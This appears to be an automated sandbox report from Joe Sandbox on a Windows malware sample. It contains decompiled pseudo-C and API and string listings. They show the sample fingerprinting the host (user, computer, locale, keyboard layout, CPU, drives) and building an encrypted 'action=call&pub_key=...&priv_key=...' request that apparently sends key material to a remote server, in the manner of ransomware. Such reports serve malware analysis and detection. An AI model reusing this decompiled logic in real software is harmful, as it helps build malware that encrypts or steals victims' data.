0x0f1d752b
0x0f1d753d
0x0f1d7547
0x00000000
0x0f1d7549
0x0f1d7559
0x0f1d763a
0x0f1d763c
0x0f1d7641
0x0f1d7641
0x0f1d755f
0x0f1d755f
0x0f1d7569
0x0f1d7569
0x0f1d757e
0x0f1d7580
0x0f1d758d
0x00000000
0x0f1d7593
0x0f1d740e
0x0f1d7410
0x0f1d7413
0x0f1d742b
0x0f1d7432
0x0f1d743a
0x0f1d747e
0x0f1d7488
0x0f1d748f
0x00000000
0x0f1d748f
0x0f1d743f
0x0f1d7456
0x0f1d745e
0x0f1d7469
0x0f1d7460
0x0f1d7460
0x0f1d7460
0x0f1d7472
0x0f1d747c
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d73a2
0x0f1d73b0
0x0f1d73b2
0x0f1d73b7
0x00000000
0x00000000
0x0f1d73b9
0x0f1d73cf
0x0f1d73d6
0x0f1d73f1
0x0f1d73f1
0x0f1d73f3
0x00000000
0x0f1d73f3
0x0f1d73d8
0x0f1d73df
0x00000000
0x00000000
0x0f1d73f1
0x00000000
0x0f1d73f1

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1D7357
GetUserNameW.ADVAPI32(00000000,?), ref: 0F1D7368
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1D7386
GetComputerNameW.KERNEL32 ref: 0F1D7390
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D73B0
wsprintfW.USER32 ref: 0F1D73F1
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D740E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F1D7432
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F1D4640,?), ref: 0F1D7456
GetLastError.KERNEL32 ref: 0F1D7469
RegCloseKey.KERNEL32(00000000), ref: 0F1D7472
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D748F
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0F1D74AD
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F1D74C3
wsprintfW.USER32 ref: 0F1D74DD
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0F1D74FF
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0F1D4640,?), ref: 0F1D7521
GetLastError.KERNEL32 ref: 0F1D7534
RegCloseKey.KERNEL32(?), ref: 0F1D753D
lstrcmpiW.KERNEL32(0F1D4640,00000419), ref: 0F1D7551
wsprintfW.USER32 ref: 0F1D757E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D758D
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0F1D75AD
wsprintfW.USER32 ref: 0F1D75F6
GetNativeSystemInfo.KERNEL32(?), ref: 0F1D7605
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0F1D7616
wsprintfW.USER32 ref: 0F1D763A
ExitProcess.KERNEL32 ref: 0F1D7641
wsprintfW.USER32 ref: 0F1D7669
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F1D76A7
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0F1D76BA
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0F1D76C4
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0F1D76FE
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F1D7730
wsprintfW.USER32 ref: 0F1D7768
lstrcatW.KERNEL32(?,0000060C), ref: 0F1D777D
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0F1D7789
GetProcAddress.KERNEL32(00000000), ref: 0F1D7790
lstrlenW.KERNEL32(?), ref: 0F1D77A0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D77D1

Part of subcall function 0F1D7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F1D7A2D
Part of subcall function 0F1D7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0F1D7AA1
Part of subcall function 0F1D7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F1D7AB6
Part of subcall function 0F1D7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1D7ACC

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F1D7828
GetDriveTypeW.KERNEL32(?), ref: 0F1D786F
lstrcatW.KERNEL32(?,?), ref: 0F1D7896
lstrcatW.KERNEL32(?,0F1E029C), ref: 0F1D78A8
lstrcatW.KERNEL32(?,0F1E0310), ref: 0F1D78B2
GetDiskFreeSpaceW.KERNEL32(?,?,0F1D4640,?,00000000), ref: 0F1D78C8
lstrlenW.KERNEL32(?,?,00000000,0F1D4640,00000000,00000000,00000000,0F1D4640,00000000), ref: 0F1D7910
wsprintfW.USER32 ref: 0F1D792A
lstrlenW.KERNEL32(?), ref: 0F1D7938
wsprintfW.USER32 ref: 0F1D794C
lstrcatW.KERNEL32(?,0F1E0330), ref: 0F1D795F
lstrcatW.KERNEL32(?,0F1E0334), ref: 0F1D796B
lstrlenW.KERNEL32(?), ref: 0F1D7986
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0F1D79A9
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0F1D79D0

Strings

SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0F1D73C5
Itanium, xrefs: 0F1D7655
Unknown, xrefs: 0F1D7663
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0F1D75BB
%I64u, xrefs: 0F1D7943
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0F1D75DF
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0F1D7716, 0F1D774B
Control Panel\International, xrefs: 0F1D7421
Domain, xrefs: 0F1D73C0
ProcessorNameString, xrefs: 0F1D7711
Identifier, xrefs: 0F1D7746
LocaleName, xrefs: 0F1D744E
WORKGROUP, xrefs: 0F1D73E1
@, xrefs: 0F1D743F
ntdll.dll, xrefs: 0F1D7784
x64, xrefs: 0F1D7647
ARM, xrefs: 0F1D764E
undefined, xrefs: 0F1D73E9
error, xrefs: 0F1D75EE
productName, xrefs: 0F1D75B6, 0F1D75DA
?:\, xrefs: 0F1D784D
00000419, xrefs: 0F1D7549
i)w, xrefs: 0F1D7551
x86, xrefs: 0F1D765C
%I64u/, xrefs: 0F1D7924
RtlComputeCrc32, xrefs: 0F1D777F
Keyboard Layout\Preload, xrefs: 0F1D74F5

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-3138453034
Opcode ID: 0f669127c280ddb2a15e26e3b611487514bfe0ef5f1bbe67fd752766ba8bf3c4
Instruction ID: d1f68d7ce599b110f749b8dcd367ead329d4b156d3c420c2775e754e2e7a2271
Opcode Fuzzy Hash: 0f669127c280ddb2a15e26e3b611487514bfe0ef5f1bbe67fd752766ba8bf3c4
Instruction Fuzzy Hash: 6812BB70A81705AFEB21CFA0CC4AFAABBB8FF08701F100519F641A61D2D7B5B964CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D5880 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0F1D5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t168;
				void* _t170;
				signed int _t172;
				void* _t183;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				signed int _t266;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E0F1D39F0( &_v404);
				E0F1D7330( &_v492, __edx); // executed
				_t255 = E0F1D7140( &_v492);
				_t266 = _a8 + __edx;
				_t7 = _t266 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40); // executed
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40); // executed
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E0F1D6F40( &_v440, _t259); // executed
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.3r");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t168 = VirtualAlloc(0, _t279, 0x3000, 0x40); // executed
					_t219 = _t168;
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xf1dfc78]");
					_v448 = _t233;
					_t234 =  *0xf1dfc84; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xf1dfc86; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E0F1D9010( &_v295, 0, 0xff);
					E0F1D5D70( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E0F1D5E20( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_t183 = VirtualAlloc(0, _t281, 0x3000, 0x40); // executed
					_v504 = _t183;
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E0F1D54A0(_t283,  &_v508, 1); // executed
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E0F1D7C10( &_v408);
				return _t268;
			}

0x0f1d588f
0x0f1d5890
0x0f1d5892
0x0f1d5893
0x0f1d5898
0x0f1d589e
0x0f1d58a2
0x0f1d58a4
0x0f1d58a5
0x0f1d58a7
0x0f1d58a8
0x0f1d58aa
0x0f1d58ab
0x0f1d58ad
0x0f1d58ae
0x0f1d58b3
0x0f1d58b5
0x0f1d58b6
0x0f1d58bf
0x0f1d58c8
0x0f1d58d9
0x0f1d58db
0x0f1d58e4
0x0f1d58ea
0x0f1d58f0
0x0f1d58f6
0x0f1d58f8
0x0f1d58fc
0x0f1d5903
0x0f1d590c
0x0f1d5921
0x0f1d5925
0x0f1d5912
0x0f1d5912
0x0f1d5915
0x0f1d5919
0x0f1d591d
0x0f1d591d
0x0f1d592f
0x0f1d5936
0x0f1d594f
0x0f1d594f
0x0f1d5951
0x0f1d5938
0x0f1d5938
0x0f1d593d
0x00000000
0x0f1d593f
0x0f1d593f
0x0f1d5941
0x0f1d5945
0x0f1d5947
0x0f1d5949
0x0f1d5949
0x0f1d593d
0x0f1d595a
0x0f1d595e
0x0f1d596d
0x0f1d596f
0x0f1d596f
0x0f1d5975
0x00000000
0x0f1d597b
0x0f1d597b
0x0f1d5987
0x0f1d599a
0x0f1d599f
0x0f1d59b3
0x0f1d59bc
0x0f1d59d0
0x0f1d59d5
0x0f1d59df
0x0f1d59e3
0x0f1d59e7
0x0f1d59ef
0x0f1d59f1
0x0f1d59f5
0x0f1d59f8
0x0f1d5a0f
0x0f1d59fe
0x0f1d5a01
0x0f1d5a05
0x0f1d5a09
0x0f1d5a09
0x0f1d5a1a
0x0f1d5a20
0x0f1d5a2a
0x0f1d5a2a
0x0f1d5a36
0x0f1d5a3c
0x0f1d5a3e
0x0f1d5a42
0x0f1d5a46
0x0f1d5a50
0x0f1d5a50
0x0f1d5a55
0x0f1d5a5b
0x0f1d5a5e
0x0f1d5a5e
0x0f1d5a63
0x0f1d5a64
0x0f1d5a66
0x0f1d5a6a
0x0f1d5a6e
0x0f1d5a6e
0x0f1d5a73
0x0f1d5a79
0x0f1d5a7b
0x0f1d5a7f
0x0f1d5a83
0x0f1d5a83
0x0f1d5a88
0x0f1d5a8e
0x0f1d5a91
0x0f1d5a91
0x0f1d5a96
0x0f1d5a97
0x0f1d5a99
0x0f1d5a9d
0x0f1d5a83
0x0f1d5aa1
0x0f1d5ab1
0x0f1d5ac0
0x0f1d5ac4
0x0f1d5acf
0x0f1d5ad2
0x0f1d5af0
0x0f1d5afc
0x0f1d5aff
0x0f1d5b21
0x0f1d5b2d
0x0f1d5b47
0x0f1d5b4d
0x0f1d5b57
0x0f1d5b59
0x0f1d5b5f
0x0f1d5b68
0x0f1d5b76
0x0f1d5b6e
0x0f1d5b6e
0x0f1d5b6e
0x0f1d5b7e
0x0f1d5b80
0x0f1d5b86
0x0f1d5b88
0x0f1d5b97
0x0f1d5b9b
0x0f1d5ba7
0x0f1d5bac
0x0f1d5bb5
0x0f1d5bbb
0x0f1d5bbf
0x0f1d5bc7
0x0f1d5be8
0x0f1d5bf1
0x0f1d5bff
0x0f1d5c0e
0x0f1d5c12
0x0f1d5c2e
0x0f1d5c30
0x0f1d5c30
0x0f1d5c40
0x0f1d5c40
0x0f1d5c46
0x0f1d5c4d
0x0f1d5c53
0x0f1d5c53
0x0f1d5c56
0x0f1d5c5c
0x0f1d5c66
0x0f1d5c66
0x0f1d5c5e
0x0f1d5c5e
0x0f1d5c64
0x00000000
0x00000000
0x0f1d5c64
0x0f1d5c6f
0x0f1d5c75
0x0f1d5c77
0x0f1d5c7b
0x0f1d5c80
0x0f1d5c80
0x0f1d5c85
0x0f1d5c8b
0x0f1d5c8e
0x0f1d5c8e
0x0f1d5c93
0x0f1d5c94
0x0f1d5c96
0x0f1d5c9a
0x0f1d5c80
0x0f1d5c9e
0x0f1d5cb4
0x0f1d5cc0
0x0f1d5cca
0x0f1d5cd4
0x0f1d5d07
0x0f1d5d0d
0x0f1d5d12
0x0f1d5d12
0x0f1d5d26
0x0f1d5d33
0x0f1d5d40
0x0f1d5d4a
0x0f1d5d4a
0x0f1d5cd6
0x0f1d5ce7
0x0f1d5cf4
0x0f1d5d01
0x0f1d5d03
0x0f1d5d03
0x0f1d5cd4
0x0f1d5d5a
0x0f1d5d60
0x0f1d5d6d

APIs

Part of subcall function 0F1D39F0: GetProcessHeap.KERNEL32(?,?,0F1D4637,00000000,?,00000000,00000000), ref: 0F1D3A8C

Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1D7357
Part of subcall function 0F1D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1D7368
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1D7386
Part of subcall function 0F1D7330: GetComputerNameW.KERNEL32 ref: 0F1D7390
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D73B0
Part of subcall function 0F1D7330: wsprintfW.USER32 ref: 0F1D73F1
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D740E
Part of subcall function 0F1D7330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F1D7432
Part of subcall function 0F1D7330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F1D4640,?), ref: 0F1D7456
Part of subcall function 0F1D7330: RegCloseKey.KERNEL32(00000000), ref: 0F1D7472

Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7192
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D719D
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71B3
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71BE
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71D4
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71DF
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71F5
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(0F1D4966,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7200
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7216
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7221
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7237
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7242
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7261
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D726C

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F1D58F0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F1D599A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F1D59B3
lstrlenA.KERNEL32(00000000), ref: 0F1D59BC
lstrlenA.KERNEL32(?), ref: 0F1D59C4
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F1D59D5
lstrlenA.KERNEL32(?), ref: 0F1D59EF
lstrlenA.KERNEL32(00000000), ref: 0F1D5A18
lstrlenA.KERNEL32(?), ref: 0F1D5A38
lstrlenA.KERNEL32(?), ref: 0F1D5A64
lstrlenA.KERNEL32(00000000), ref: 0F1D5A75
lstrlenA.KERNEL32(00000000), ref: 0F1D5A97
lstrcatW.KERNEL32(?,action=call&), ref: 0F1D5AB1
lstrlenW.KERNEL32(?), ref: 0F1D5ABA
lstrcatW.KERNEL32(?,&pub_key=), ref: 0F1D5ACF
lstrlenW.KERNEL32(?), ref: 0F1D5AD2
lstrlenA.KERNEL32(00000000), ref: 0F1D5ADB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,772969A0,00000000), ref: 0F1D5AF0
lstrcatW.KERNEL32(?,&priv_key=), ref: 0F1D5AFC
lstrlenW.KERNEL32(?), ref: 0F1D5AFF
lstrlenA.KERNEL32(00000000), ref: 0F1D5B0C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,772969A0,00000000), ref: 0F1D5B21
lstrcatW.KERNEL32(?,&version=2.3r), ref: 0F1D5B2D
lstrlenW.KERNEL32(?), ref: 0F1D5B39
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0F1D5B4D
lstrlenW.KERNEL32(?), ref: 0F1D5B5D
lstrlenW.KERNEL32(?), ref: 0F1D5B7E
_memset.LIBCMT ref: 0F1D5BC7
lstrlenA.KERNEL32(?), ref: 0F1D5BDA

Part of subcall function 0F1D5D70: _memset.LIBCMT ref: 0F1D5D9D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0F1D5C26
GetLastError.KERNEL32 ref: 0F1D5C30
lstrlenA.KERNEL32(?), ref: 0F1D5C37
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F1D5C46
lstrlenA.KERNEL32(?), ref: 0F1D5C51
lstrlenA.KERNEL32(?), ref: 0F1D5C71
lstrlenA.KERNEL32(?), ref: 0F1D5C94
lstrlenA.KERNEL32(00000000), ref: 0F1D5CA3
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0F1D5CB4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5CE7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5CF4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5D01
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5D26
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5D33
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5D40
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D5D5A

Strings

&version=2.3r, xrefs: 0F1D5B27
&priv_key=, xrefs: 0F1D5AF6
action=call&, xrefs: 0F1D5AAB
&pub_key=, xrefs: 0F1D5AC9
#shasj, xrefs: 0F1D5B80

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
API String ID: 2781787645-472827701
Opcode ID: 648143cbd28c0ea0e6d09aad781f6f5df602b6333ab3afdd8e762784cd647883
Instruction ID: 562305d2f0227934cbb019c6696b0b77dffe82729d9e039c7fb67eabd356a4b7
Opcode Fuzzy Hash: 648143cbd28c0ea0e6d09aad781f6f5df602b6333ab3afdd8e762784cd647883
Instruction Fuzzy Hash: 38E1CA31109312AFD714CF24CC80B6BBBFAEF88764F08491CF585A7291D774A925CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D7EF0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

